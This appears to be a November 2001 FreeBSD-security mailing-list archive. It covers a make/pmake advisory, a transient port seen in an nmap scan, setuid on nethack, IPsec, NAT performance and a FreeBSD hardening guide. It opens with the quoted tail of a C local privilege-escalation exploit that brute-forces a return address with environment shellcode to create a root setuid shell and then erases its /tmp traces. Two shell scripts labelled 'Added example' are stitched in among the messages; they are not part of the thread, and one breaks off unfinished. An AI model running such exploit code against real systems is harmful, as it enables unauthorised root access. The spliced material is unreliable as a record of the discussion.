>                             write(mk, head, strlen(head));
>
>                             // brute force RET on the stack upon success
>                             printf("\n\tcreating shell in the environment");
>
>                             // create env shell
>                             ptr = (unsigned char*)&(up[i+2*10]);
>                             while(ptr<(unsigned char*)(aaaa+sizeof(aaaa)-4)) {
>                                 *ptr=0x90;
>                                 ptr++;
>                             }
>
>                             strncpy(aaaa+sizeof(aaaa)-strlen(hellcode)-1, hellcode,
>                                     strlen(hellcode));
>                             aaaa[sizeof(aaaa)-1]=0;
>                             if(len1!=strlen(aaaa)) {
>                                 printf(BD RD"\nERROR: len changed!\n"NN);
>                                 exit(7);
>                             }
>
>                             // phase 4: brute force
>                             printf("\n\n\n"BD BL"* PHASE 4\n"NN);
>                             printf("\n\tbrute force RET:\t");
>                             fflush(stdout);
>                             cnt=0;
>
>                             while(cnt
>                                 for(j=0; j<4; j++) {
>                                     up[idx+2*j] = wadr + j%4;
>                                     up[idx+2*j+1] = wadr + j%4;
>                                 }
>
>                                 pid = do_fork();
>                                 if(pid) {
>                                     printf(" 0x%.8x", wadr);
>                                     fflush(stdout);
>                                     waitpid(pid, NULL, WUNTRACED);
>                                     res = stat("sush", &sb);
>                                     if(!res && sb.st_uid==0) {
>                                         printf(BD GR"\n\nParadox, created suid shell at %s/sush\n\n"NN, getcwd(buf, sizeof(buf)-1));
>                                         system("rm -rf /tmp/make* >/dev/null 2>&1");
>                                         exit(0);
>                                     }
>                                 }
>                                 else {
>                                     res = dup2(fd, 1);
>                                     if(res<0)
>                                         perror("dup2"), exit(8);
>                                     res = dup2(fd, 2);
>                                     if(res<0)
>                                         perror("dup2"), exit(9);
>
>                                     execle(TARGET, TARGET, "-X", "-dj", NULL, myenv);
>                                     _exit(10);
>                                 }
>                                 if(cnt%8==7)
>                                     printf("\n\t\t\t\t");
>                                 cnt++;
>                                 wadr += 4;
>                             }
>                             // failure
>                             printf(BD RD"\nFAILED :-("NN);
>                             system("rm -rf /tmp/make* >/dev/null 2>&1");
>                             exit(11);
>                         }
>                     }
>                     else {
>                         res = dup2(fd, 1);
>                         if(res<0)
>                             perror("dup2"), exit(12);
>                         execle(TARGET, TARGET, "-X", "-dj", NULL, myenv);
>                         exit(13);
>                     }
>                     up[i]=old;
>                     waitpid(pid, NULL, WUNTRACED);
>                 }
>
>                 printf(BD RD"\n\tstrange error, write pos not found!\n"NN);
>                 system("rm -rf /tmp/make* >/dev/null 2>&1");
>                 exit(14);
>
>                 ptr = strtok(buf, "\n");
>                 while(ptr) {
>                     printf("\nLINE [%s]", ptr);
>                     ptr = strtok(NULL, "\n");
>                 }
>
>                 exit(15);
>             }
>
>             // start target and read output
>         }
>         else {
>             res = dup2(fd, 1);
>             if(res<0)
>                 perror("dup2"), exit(16);
>             execle(TARGET, TARGET, "-X", "-dj", NULL, myenv);
>             exit(17);
>         }
>
>         if(cnt%8==7)
>             printf("\n\t\t\t\t");
>         cnt++;
>     }
>
>     printf(BD RD"\nFAILED\n"NN);
>     system("rm -rf /tmp/make* >/dev/null 2>&1");
>
>     return 0;
> }
>

From owner-freebsd-security Wed Nov 21 20:26:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 99A4C37B418 for ; Wed, 21 Nov 2001 20:26:27 -0800 (PST)
Received: (qmail 3365 invoked by uid 1000); 22 Nov 2001 04:26:26 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Nov 2001 04:26:26 -0000
Date: Wed, 21 Nov 2001 22:26:26 -0600 (CST)
From: Mike Silbersack
To:
Subject: Re: Advisory: Berkeley pmake
In-Reply-To: <20011121221635.C2710-100000@achilles.silby.com>
Message-ID: <20011121222522.H2710-100000@achilles.silby.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

Er, I should clarify my comments on pmake. I examined make in the base system... I have no idea if we have pmake in ports and/or if it is affected.
Mike "Silby" Silbersack

From owner-freebsd-security Wed Nov 21 20:27:48 2001
Date: Wed, 21 Nov 2001 22:27:43 -0600 (CST)
From: Mike Silbersack
To: Geoff Lawn
Subject: Re: Unknown transient service 1528/tcp
In-Reply-To: <020801c1730b$8cd21fe0$41414fcb@lawn>
Message-ID: <20011121222647.O2710-100000@achilles.silby.com>

On Thu, 22 Nov 2001, Geoff Lawn wrote:

> Hi there,
>
> I regularly do an nmap on our server with the following results...
>
> Port       State       Service
> 21/tcp     open        ftp
> 22/tcp     open        ssh
> 25/tcp     open        smtp
> 110/tcp    open        pop-3
> 443/tcp    open        https
>
> Recently I noticed the following service appear...
> 1528/tcp   open        mciautoreg
>
> I did another nmap a minute later and the service was no longer there.
>
> Does anyone know what this might be?
> Have I been hacked??
>
> Thanks,
> Geoff

Were you nmapping the machine nmap was running on?  You sometimes catch
the port nmap is running the scan from when doing it that way, if I
recall correctly.
Mike "Silby" Silbersack

From owner-freebsd-security Wed Nov 21 21:20:57 2001
Date: Thu, 22 Nov 2001 00:19:15 -0500
From: Pierre-Luc Lespérance
Cc: security@freebsd.org
Subject: Re: Unknown transient service 1528/tcp
References: <020801c1730b$8cd21fe0$41414fcb@lawn>
Message-ID: <3BFC8AD3.8DC9E56D@videotron.ca>

Geoff Lawn wrote:
>
> Hi there,
>
> I regularly do an nmap on our server with the following results...
>
> Port       State       Service
> 21/tcp     open        ftp
> 22/tcp     open        ssh
> 25/tcp     open        smtp
> 110/tcp    open        pop-3
> 443/tcp    open        https
>
> Recently I noticed the following service appear...
> 1528/tcp   open        mciautoreg
>

The best way to figure out what's listening on your computer may be
netstat and sockstat, because nmap by default *does not* test all ports.
For example:

    netstat -an | grep LISTEN

sockstat is very useful too.  Take a look.
From owner-freebsd-security Wed Nov 21 21:34:30 2001
Date: Thu, 22 Nov 2001 05:35:55 +0100
From: Zahemszky Gábor
To: freebsd-security@freebsd.org
Subject: Re: Advisory: Berkeley pmake
Message-ID: <20011122053555.A3134@Picasso.Zahemszky.HU>
References: <20011121221635.C2710-100000@achilles.silby.com> <20011121222522.H2710-100000@achilles.silby.com>
In-Reply-To: <20011121222522.H2710-100000@achilles.silby.com>; from silby@silby.com on Wed, Nov 21, 2001 at 10:26:26PM -0600

On Wed, Nov 21, 2001 at 10:26:26PM -0600, Mike Silbersack wrote:
>
> Er, I should clarify my comments on pmake.  I examined make in the base
> system... I have no idea if we have pmake in ports and/or if it is
> affected.

Yes, we have pmake in ports/devel/pmake, and it's version 2.1.33 (on
FBSD 4.4R).  By the way, I didn't check the vulnerability.

Bye,
ZGabor < Gabor at Zahemszky dot HU >

--
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"

From owner-freebsd-security Wed Nov 21 22:36:10 2001
Date: Thu, 22 Nov 2001 15:36:13 +0900
From: Shoichi Sakane
To: freebsd-security-local@insignia.com
Cc: freebsd-security@freebsd.org
Subject: Re: KAME IPSec <->Redcreek
In-Reply-To: Your message of "Wed, 21 Nov 2001 10:21:04 +0000"
Message-Id: <20011122153613U.sakane@kame.net>

> I wonder anyone has had success talking to a RedCreek Ravlin
> VPN gateway. I have some colleagues who are successfully using
> freeswan, but I'm having none at all with racoon.
>
> A packet trace shows the initial packet going to port 500 of
> the Ravlin, but no response. Unfortunately the Ravlin doesn't
> syslog anything at all in this situation, so it's kind of
> hard to debug!

Did you compare the Ravlin's configuration with racoon's?  If there was
a mismatch, the negotiation would fail.  During the phase 1 negotiation,
sometimes the node would discard silently.
There is a possibility that the Ravlin requires the main mode of IKE.
But according to your explanation, the packet might not reach port 500
of the Ravlin because there might be packet filtering.

From owner-freebsd-security Thu Nov 22 0:47:49 2001
Date: Thu, 22 Nov 2001 10:48:59 +0200
From: Sheldon Hearn
To: "Dave Raven"
Cc: freebsd-security@FreeBSD.org
Subject: Re: Best security topology for FreeBSD
In-reply-to: Your message of "Wed, 21 Nov 2001 19:25:12 +0200." <005f01c172b1$7a8503c0$3600a8c0@DAVE>
Message-ID: <18259.1006418939@axl.seasidesoftware.co.za>

On Wed, 21 Nov 2001 19:25:12 +0200, "Dave Raven" wrote:

> With IPFilter this is not so, IPNat runs in the kernel and should be faster.
> If you are planning on large usage I would recommend IPFilter (less load)
> and IPNat.

I'm having trouble with IPFW+natd servicing a high-volume web cluster.
I'm finding that natd hogs just about all available cycles on one of the
two PII CPUs in the box.  The throughput through the firewall has also
dropped since I migrated from the Linux IPchains monster we had before.

I'll post my findings in follow-up later this month.

Ciao,
Sheldon.
From owner-freebsd-security Thu Nov 22 0:52:35 2001
Date: Thu, 22 Nov 2001 02:52:28 -0600
From: Alfred Perlstein
To: Sheldon Hearn
Cc: Dave Raven, freebsd-security@FreeBSD.org
Subject: Re: Best security topology for FreeBSD
Message-ID: <20011122025228.X13393@elvis.mu.org>
References: <005f01c172b1$7a8503c0$3600a8c0@DAVE> <18259.1006418939@axl.seasidesoftware.co.za>
In-Reply-To: <18259.1006418939@axl.seasidesoftware.co.za>; from sheldonh@starjuice.net on Thu, Nov 22, 2001 at 10:48:59AM +0200

* Sheldon Hearn [011122 02:47] wrote:
>
> On Wed, 21 Nov 2001 19:25:12 +0200, "Dave Raven" wrote:
>
> > With IPFilter this is not so, IPNat runs in the kernel and should be faster.
> > If you are planning on large usage I would recommend IPFilter (less load)
> > and IPNat.
>
> I'm having trouble with IPFW+natd servicing a high-volume web cluster.
> I'm finding that natd hogs just about all available cycles on one of the
> two PII CPUs in the box.  The throughput of through the firewall has
> also dropped since I migrated from the Linux IPchains monster we had
> before.
>
> I'll post my findings in follow-up later this month.
natd isn't exactly high performance; there's nothing particularly bad
about it besides it requiring multiple copies across the userspace/kernel
boundary.

Have you taken a look at using ipfilter and ipnat?  It may offer better
performance, no promises though.

--
-Alfred Perlstein [alfred@freebsd.org]
'Instead of asking why a piece of software is using "1970s technology,"
start asking why software is ignoring 30 years of accumulated wisdom.'
http://www.morons.org/rants/gpl-harmful.php3

From owner-freebsd-security Thu Nov 22 1:15:44 2001
Date: Thu, 22 Nov 2001 10:15:37 +0100
From: "Anthony Atkielski"
To: "FreeBSD Questions"
Subject: setuid on nethack?
Message-ID: <014201c17336$40653f90$0a00000a@atkielski.com>

This morning I see an e-mail from the system telling me that setuid is
set on nethack, the adventure-style game that I installed recently.  Why
would this game require this bit?  I reset it with chmod 0544, which
seems like plenty to me.
From owner-freebsd-security Thu Nov 22 1:25:31 2001
Date: Thu, 22 Nov 2001 11:24:16 +0200
From: Peter Pentchev
To: Anthony Atkielski
Cc: FreeBSD Questions, freebsd-security@freebsd.org
Subject: Re: setuid on nethack?
Message-ID: <20011122112415.B855@straylight.oblivion.bg>
References: <014201c17336$40653f90$0a00000a@atkielski.com>
In-Reply-To: <014201c17336$40653f90$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:15:37AM +0100

On Thu, Nov 22, 2001 at 10:15:37AM +0100, Anthony Atkielski wrote:
> This morning I see an e-mail from the system telling me that setuid is set on
> nethack, the adventure-style game that I installed recently.  Why would this
> game require this bit?  I reset it with chmod 0544, which seems like plenty to
> me.

AFAIK, many games on Unix systems are setuid or setgid 'games', so that
any user on the system can read and write the high scores and saved games.
If you only intend to play Nethack from one particular system account,
you should have no problem without the setuid bit, but make sure to
set the appropriate owner/group/permissions on the high scores and
saved games files/dirs.
G'luck,
Peter

--
If this sentence didn't exist, somebody would have invented it.

From owner-freebsd-security Thu Nov 22 1:30:17 2001
Date: Thu, 22 Nov 2001 10:29:36 +0100
From: "Anthony Atkielski"
To: "Peter Pentchev"
Cc: "FreeBSD Questions"
Subject: Re: setuid on nethack?
References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg>
Message-ID: <016001c17338$37d65240$0a00000a@atkielski.com>

After seeing that the owner and group were games, I set the permissions
back to 2511, which I assume is safe.

Do I need to take special precautions if I play this game from root?
Would 6511 be a better choice in that case?

From owner-freebsd-security Thu Nov 22 1:40:44 2001
Date: Thu, 22 Nov 2001 11:41:50 +0200
From: Sheldon Hearn
To: Pierre-Luc Lespérance
Cc: security@freebsd.org
Subject: Re: Unknown transient service 1528/tcp
In-reply-to: Your message of "Thu, 22 Nov 2001 00:19:15 EST." <3BFC8AD3.8DC9E56D@videotron.ca>
Message-ID: <19463.1006422110@axl.seasidesoftware.co.za>

On Thu, 22 Nov 2001 00:19:15 EST, Pierre-Luc Lespérance wrote:

> The best way to figure out what's listening
> on your computer may be netstat and sockstat.

Except that the machine lies less to the outside world when it's been
hacked.  The netstat binary is a favourite candidate for being replaced
by rootkits, as I recently discovered when our Linux firewall was hacked.

Using tools on a local system that you suspect to have been hacked can
be problematic, especially when the system has been set up to
periodically rewrite key system binaries.  With the advent of kqueue,
it's possible for things like ps, top and netstat to be rewritten every
time you update them with fresh, virgin copies!

Ciao,
Sheldon.

From owner-freebsd-security Thu Nov 22 1:49:13 2001
Date: Thu, 22 Nov 2001 11:48:13 +0200
From: Peter Pentchev
To: Anthony Atkielski
Cc: FreeBSD Questions, freebsd-security@FreeBSD.ORG
Subject: Re: setuid on nethack?
Message-ID: <20011122114813.C855@straylight.oblivion.bg>
References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com>
In-Reply-To: <016001c17338$37d65240$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:29:36AM +0100

On Thu, Nov 22, 2001 at 10:29:36AM +0100, Anthony Atkielski wrote:
> After seeing that the owner and group were games, I set the permissions back to
> 2511, which I assume is safe.
>
> Do I need to take special precautions if I play this game from root?  Would 6511
> be a better choice in that case?

No, no special precautions should be necessary.  AFAIK, nethack does
not read any executable code from its data files, so any trojan would
have to be placed in the nethack executable itself.  I personally have
never heard of somebody trojaning the nethack game so far :)

G'luck,
Peter

--
You have, of course, just begun reading the sentence that you have just finished reading.
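Added example for the 2511 vs 6511 question above (it is not code from this thread): an sh script of the kind Peter Pentchev suggests later in the thread, which reads a package's file list in the shape `pkg_info -qL` prints, reports every file carrying a setuid or setgid bit, and can clear setuid while leaving setgid in place. The function names, the `demo` package in a temporary directory and the sample file names are assumptions of the example.

```shell
#!/bin/sh
# Added example (not code from this thread): audit the files a package
# installed for setuid/setgid bits, and clear setuid while leaving setgid.
# Input is one path per line, the shape `pkg_info -qL <pkg>` prints; the
# demo at the bottom feeds a constructed list in a temporary directory.

# audit_privileged LIST
#   For each regular file in LIST carrying a setuid or setgid bit, print
#   "<SETUID|SETGID> <mode> <owner>:<group> <path>".  Directories, symlinks
#   and missing paths (pkg_info -qL lists directories too) are skipped.
#   setuid is reported ahead of setgid because it is the bigger risk: a
#   setgid games binary can only clobber score/save files, a setuid binary
#   runs with its owner's full identity.
audit_privileged() {
    list=$1
    while IFS= read -r path; do
        [ -f "$path" ] && [ ! -L "$path" ] || continue
        if [ -u "$path" ]; then
            risk=SETUID
        elif [ -g "$path" ]; then
            risk=SETGID
        else
            continue
        fi
        # ls -ld prints "mode links owner group ..." on BSD and Linux alike
        info=$(ls -ld "$path" | awk '{print $1, $3 ":" $4}')
        printf '%s %s %s\n' "$risk" "$info" "$path"
    done < "$list"
}

# drop_setuid LIST
#   chmod u-s every regular file in LIST that has the setuid bit, keeping
#   any setgid bit (the games gid is what the save/score files need).
#   Needs root for files you do not own.
drop_setuid() {
    list=$1
    while IFS= read -r path; do
        [ -f "$path" ] && [ ! -L "$path" ] && [ -u "$path" ] || continue
        chmod u-s "$path" && printf 'cleared setuid: %s\n' "$path"
    done < "$list"
}

# demo: a constructed "package" in a temp dir (not a real port), audited,
# stripped of setuid, then audited again.
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/nethack"; chmod 2755 "$d/nethack"   # setgid games style
    : > "$d/oldgame"; chmod 4755 "$d/oldgame"   # setuid: the case to fix
    : > "$d/readme";  chmod 0644 "$d/readme"
    mkdir "$d/share"
    printf '%s\n' "$d/nethack" "$d/oldgame" "$d/readme" "$d/share" \
        "$d/gone" > "$d/plist"
    echo "before:"; audit_privileged "$d/plist"
    drop_setuid "$d/plist"
    echo "after:";  audit_privileged "$d/plist"
    rm -rf "$d"
}

demo
```

On a real system, feed it `pkg_info -qL nethack > plist` and run `audit_privileged plist` as root before deciding whether anything needs `drop_setuid`.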
From owner-freebsd-security Thu Nov 22 2: 7:48 2001
Date: Thu, 22 Nov 2001 11:07:16 +0100
From: "Anthony Atkielski"
To: "Peter Pentchev"
Cc: "FreeBSD Questions"
Subject: Re: setuid on nethack?
References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg>
Message-ID: <016601c1733d$7a516b00$0a00000a@atkielski.com>

What about in the more general case of games?  Would it be a good idea
to set game files to games:games and 6511?  And what about other types
of executables?

When I add ports and stuff to my system, sometimes they are picked up
from some bizarre FTP sites, and in cases where the executables do not
have to be trusted, some guidelines on how better to secure them would be
welcome.  I know that often they are being rebuilt from source before
installation, but it isn't really practical to read through the source
for every port just to look for suspicious code.

Are ports examined by anyone anywhere for security problems before being
included in the FreeBSD list of ports?

From owner-freebsd-security Thu Nov 22 2:35:57 2001
Date: Thu, 22 Nov 2001 12:35:10 +0200
From: Peter Pentchev
To: Anthony Atkielski
Cc: FreeBSD Questions, freebsd-security@FreeBSD.ORG
Subject: Re: setuid on nethack?
Message-ID: <20011122123510.A611@straylight.oblivion.bg>
References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> <016601c1733d$7a516b00$0a00000a@atkielski.com>
In-Reply-To: <016601c1733d$7a516b00$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 11:07:16AM +0100

On Thu, Nov 22, 2001 at 11:07:16AM +0100, Anthony Atkielski wrote:
> What about in the more general case of games?  Would it be a good idea to set
> game files to games:games and 6511?  And what about other types of executables?
>
> When I add ports and stuff to my system, sometimes they are picked up from some
> bizarre FTP sites, and in cases where the executables do not have to be trusted,
> some guidelines on how better to secure them would be welcome.  I know that
> often they are being rebuilt from source before installation, but it isn't
> really practical to read through the source for every port just to look for
> suspicious code.
>
> Are ports examined by anyone anywhere for security problems before being
> included in the FreeBSD list of ports?

Yes, they are being actively examined by the maintainer of the port in
question.  It is the port maintainer's job to look through the changes
from version to version and to decide what and where is good and what is
not.  Cases have been known when a maintainer has decided not to update
the port to a new version, or even to update, but disable or patch a new
"feature" away.

In general, yes, you can trust the ports from the Ports Collection for
rebuilding from source (the source tarballs have their MD5 checksums
recorded in the Ports Collection files), and the packages downloaded
from FreeBSD mirrors (they are built from the Ports Collection).

Still, nothing prevents you from changing BINOWN and BINMODE before
building specific ports; the penv(1) utility in ports/sysutils/penv
might come in handy :)

For packages, the situation is a bit weirder, but you could easily write
a script that parses the output of pkg_info -qL, finds the executables
installed by a package and fixes the ownership/permissions.

G'luck,
Peter

--
"yields falsehood, when appended to its quotation." yields falsehood, when appended to its quotation.

From owner-freebsd-security Thu Nov 22 2:48:20 2001
Date: Thu, 22 Nov 2001 02:48:13 -0800
From: Kris Kennaway
To: Anthony Atkielski
Cc: FreeBSD Questions, freebsd-security@FreeBSD.ORG
Subject: Re: setuid on nethack?
Message-ID: <20011122024813.A24038@xor.obsecurity.org>
References: <014201c17336$40653f90$0a00000a@atkielski.com>
In-Reply-To: <014201c17336$40653f90$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:15:37AM +0100

On Thu, Nov 22, 2001 at 10:15:37AM +0100, Anthony Atkielski wrote:
> This morning I see an e-mail from the system telling me that setuid is set on
> nethack, the adventure-style game that I installed recently.  Why would this
> game require this bit?  I reset it with chmod 0544, which seems like plenty to

On multiuser systems the nethack binary needs the ability to write saved
games and score files, when nethack is run by a variety of different
users.  This is the case for a lot of games; a while back I went through
and did a sweep to make sure that any games which require extra privilege
for this purpose are using setgid games, not setuid anything (because the
games gid only has the power to overwrite the score/save files for the
games, and cannot take over any binaries directly as it could if they
were setuid).  Thus, it's only a marginal risk on a multiuser system (but
still a slight risk, as with all binaries which execute with privilege).
If you're on a single-user system then none of this should concern you
anyway.

If it does concern you then feel free to pkg_delete :-)

Kris

From owner-freebsd-security Thu Nov 22 3: 2:52 2001
Date: Thu, 22 Nov 2001 11:02:37 +0000
From: Marc Silver
To: freebsd-security@freebsd.org
Subject: A basic guide to securing FreeBSD 4.x-STABLE ??
Message-ID: <20011122110236.S7882@draenor.org>

Hi there,

A few days ago, a friend asked me if I could possibly write him some tips
for securing his FreeBSD installation.  I went a little overboard and as
a result, this document came about.  I'd like to request
comment/flames/suggestions regarding it, since the contents are based
purely on my experiences and needs.  Any insight or even alternate views
are welcome.
You can find the document at:

http://draenor.org/securebsd/secure.txt - plain text (also attached)
http://draenor.org/securebsd/secure.pdf - PDF format

Please reply to this address, as I am not currently subscribed to this list.

Cheers,
Marc

-- 
I've learned that being kind is more important than being right.
-- Andy Rooney

Content-Disposition: attachment; filename="secure.txt"

+===================================================================+
+           A basic guide to securing FreeBSD 4.x-STABLE            +
+-------------------------------------------------------------------+
+                                                                   +
+                    Written by Marc Silver 2001                    +
+                                                                   +
+===================================================================+

$Id: secure,v 1.5 2001/11/22 10:54:42 marcs Exp $

Overview
========

The word security means different things to different people. While this document covers various aspects and suggests things that can be done to secure FreeBSD, it is by no means a definitive guide to securing FreeBSD. It is merely a model that I use on my own machines, and one that I have had great success with. I'd also like to point out that I am by no means a security 'expert'... I am merely a _very_ paranoid sysadmin who takes great pride in securing my servers. For a broader look at security on FreeBSD, and as a primer to this document, I would suggest that everyone read the man page for security(7) on their FreeBSD system.

This is a work in progress. As such, this document will change, grow and develop over time. If you have something to add, or wish to suggest a change/make a comment or say anything for that matter, please email me (marcs@draenor.org).

With that out of the way, let's begin.

It should be noted that this document isn't by any means going to stop remote or local DoS attacks. It can merely help you to better secure default FreeBSD installations.
The Foundation for a secure system
==================================

A system should be set up to be secure from the very beginning. There are a number of things that can be done during the FreeBSD installation that can save you serious headaches later. In my opinion, file system setup can make a big difference in cases where you can (and must) assume that the attacker already has a local login on the machine.

o File System Layout

The file system layout below is specific to a shell server where many users will be connecting to the machine and using it for various tasks such as mail, irc, etc. You will most likely need to adapt this to suit your own needs.

    Filesystem   1K-blocks     Used    Avail Capacity  Mounted on
    /dev/ad0s1a     198399    33019   149509    18%    /
    /dev/ad0s1f      49583    27879    17738    61%    /tmp
    /dev/ad0s1d   12348393  2563101  8797421    23%    /usr
    /dev/ad0s1h    4065262    97983  3642059     3%    /usr/people
    /dev/ad0s1g    2032623     6026  1863988     0%    /var
    procfs               4        4        0   100%    /proc

Now, let's look at the output from the mount(8) command:

    /dev/ad0s1a on / (ufs, local, soft-updates)
    /dev/ad0s1f on /tmp (ufs, local, nodev, nosuid, soft-updates)
    /dev/ad0s1d on /usr (ufs, local, soft-updates)
    /dev/ad0s1h on /usr/people (ufs, local, nosuid, with quotas, soft-updates)
    /dev/ad0s1g on /var (ufs, local, soft-updates)
    procfs on /proc (procfs, local)

Now, let's discuss why I've set things up this way. The root partition (/) is a reasonable 200MB, and is home to the kernel as well as KLD's and various other fairly important directories which are linked directly off it (/sbin comes to mind). With this in mind, it's possible at a later stage to mount the root partition as read-only, by editing the flags for this partition in the fstab(5) file.

Temporary files are stored in /tmp, and since this directory is usually world writeable, it's important to not allow certain files to be used from this directory.
Using the fstab(5) file (also see mount(8)) you should add the NOSUID and NODEV flags for /tmp, which disables suid programs and stops character or block special devices on the filesystem. You may also want to add the NOEXEC flag for /tmp, but this is severely restrictive, and may begin to make things difficult for your users, and may also limit your ability to find an intruder. It's important to note that you should symlink /usr/tmp and /var/tmp to this /tmp partition, else you're still giving users a tmp directory with no restrictions.

User specific directories are kept in /usr/people (most people prefer to use /home -- you can merely symlink /home -> /usr/people) and on this partition, it's a good idea to add the NOSUID flag, as well as adding QUOTA support to limit the amount of disk space that your users may use.

Both /usr and /var are standard partitions with soft-updates enabled.

This model can obviously be changed to suit your needs, and you can be even more anal if you wish. This however, is intended to strike a happy medium between security and usability.

o System Secure Levels

For most machines, there is absolutely no reason to run in securelevel -1, unless you're running X-Windows on the machine. If you're not running X, then I would suggest switching to securelevel 1 using the sysctl(8) variable kern.securelevel. Changing this to 1 will mean that you may no longer replace the kernel without being in single user mode (system immutable and system append-only flags are enforced), KLD's may not be loaded/unloaded and /dev/mem and /dev/kmem may not be opened for writing.

To change this without rebooting issue the command:

    sysctl kern.securelevel=1

To make this change more permanent, add the following to /etc/rc.conf:

    kern_securelevel_enable="YES"
    kern_securelevel="1"

On more critical machines, you may wish to increase the securelevel to 2 or 3. For more information on the various secure levels and what they do, please read the man page for init(8).
Securing your newly installed BSD box
=====================================

o Removal of the toor user

By default, FreeBSD ships with an additional user that has a UID of 0. This user is known as toor (root backwards), and is intended as a backup user, so that if you mistakenly broke (for eg) root's shell, you could log in using this user and fix things. The account is disabled (passwordless) by default, and hence of no use unless you change the password. You may either choose to set a password for it, or remove it. I prefer to remove it. This is purely up to you.

o Shut down services

It's important to not have any non-essential services running on the machine. The best thing to do is kill all the services running on your machine, and then explicitly enable those that you want running. This way you know for sure what's running on your machine. You can tell what ports are open on your machine by using the netstat(1) command, eg:

    secure-me (1) : netstat -na | grep LIST
    tcp4       0      0  *.80                   *.*                    LISTEN
    tcp4       0      0  *.25                   *.*                    LISTEN
    tcp4       0      0  *.22                   *.*                    LISTEN

This shows that ports 22 (ssh), 25 (smtp), and 80 (http) are listening on this machine on all IP's. If you have a process listening and you're unsure of what process is keeping that port open, you may use sockstat(1) to list open sockets and provide you with the relevant information. Use rc.conf(5) to easily configure which services start up by default, as well as local package init scripts which can be found in /usr/local/etc/rc.d

o Telnetd and its replacement - sshd

There are certain services which you do not want to run at any cost if at all possible. Specifically I am going to mention telnetd. In this day and age, it's amazing to find that people still use this horribly insecure protocol. Do NOT use telnetd if at all possible. FreeBSD (since 4.1.1) now comes with OpenSSH as part of the base system, and sshd is a perfect drop in replacement for telnetd, while remaining more secure by using encryption to protect your session.
The protocol also allows for stronger encryption with the use of RSA/DSA keys. It should be noted that the most current version of OpenSSH now uses the SSH protocol version 2, but for those systems that use a slightly older version, it is advised to only allow version 2 of the protocol. This can be done by making sure the following line exists in /etc/ssh/sshd_config:

    Protocol 2

This will tell the sshd that it should only allow SSH protocol version 2 - and it will not fall back to version 1. Please note that you may need to restart the sshd in order for this change to take effect. It's also preferable to use DSA keys wherever possible to enhance security even more.

o Crontabs

Firstly, there are certain files which you may generally not want users looking at. You can safely chmod /etc/crontab to 0640 so that only root and users in the wheel group can see it. Your users do not need to know what jobs cron triggers. At the same time, you may not want to allow users to use crontab(1) at all. You can easily stop them by creating /var/cron/deny and adding a list of users to that file. Those users will then be told:

    crontab: you (marcs) are not allowed to use this program

o ipfw

While ipfw is well beyond the scope of this document, you may wish to secure the machine further as well as gain information on attack patterns on your machine using ipfw. This can sometimes provide information that someone is more interested in your machine than they should be. See the ipfw(8) page for more information.

o Secure the console

Many people are concerned that a malicious user with physical access could simply reboot into single user mode and change the root password. While it's quite clear that if an attacker has physical access to your machine, NOTHING you do can keep it safe, you can prevent people from simply changing the root password in single user mode by performing one simple step. This can be done by changing the word 'secure' on the 'console' line to 'insecure'.
This will require you to enter the root password when dropping into single user mode.

o Process accounting

It's nice to know exactly what's happening on your machine and to this end, I would suggest enabling process accounting on any machine that you run. This enables you to tell more or less what commands users are executing, and it can also be useful when debugging certain problems. To enable, merely execute the following commands:

    secure-me (1) : touch /var/account/acct
    secure-me (2) : accton /var/account/acct

To make this change more permanent, add the following line to /etc/rc.conf:

    accounting_enable="YES"

Services
========

o Keep your packages current

When you're running daemons that are worldly visible and accessible it's important to make sure (and it's common sense) that your packages are always up to date. If you see a new version of a package you have installed, then update it via the ports tree to make sure that you've always got the latest version. It only takes a few minutes in most cases, but it's worth the effort if you're saving the machine from being compromised. It'll help to watch lists like bugtraq for security advisories.

o Keep your OS current

Similarly, it's important to keep FreeBSD itself up to date. Keep your source tree up to date, and 'make world' if/when new security patches are made available. It'll help to watch lists like bugtraq for security advisories.

Managing user accounts
======================

o User quotas

By enforcing user quotas on certain filesystems you can limit the damage that an attacker who wants to consume disk space can do. Enforce quotas wherever possible.
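As an added example that is not part of Marc's guide: a POSIX sh script that audits an fstab(5) file for the mount flags the guide recommends (nosuid and nodev on /tmp, nosuid on the user partition), so the check can be repeated after every install or edit. The policy table, the /usr/people mount point and the sample fstab are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of Marc Silver's guide: audit an fstab(5) file
# against the mount flags the guide recommends (nosuid and nodev on /tmp,
# nosuid on the user partition). The policy table and the sample fstab
# below are constructed for this demonstration.

# Policy: one "<mountpoint> <comma-separated required options>" per line.
FSTAB_POLICY='/tmp nosuid,nodev
/usr/people nosuid'

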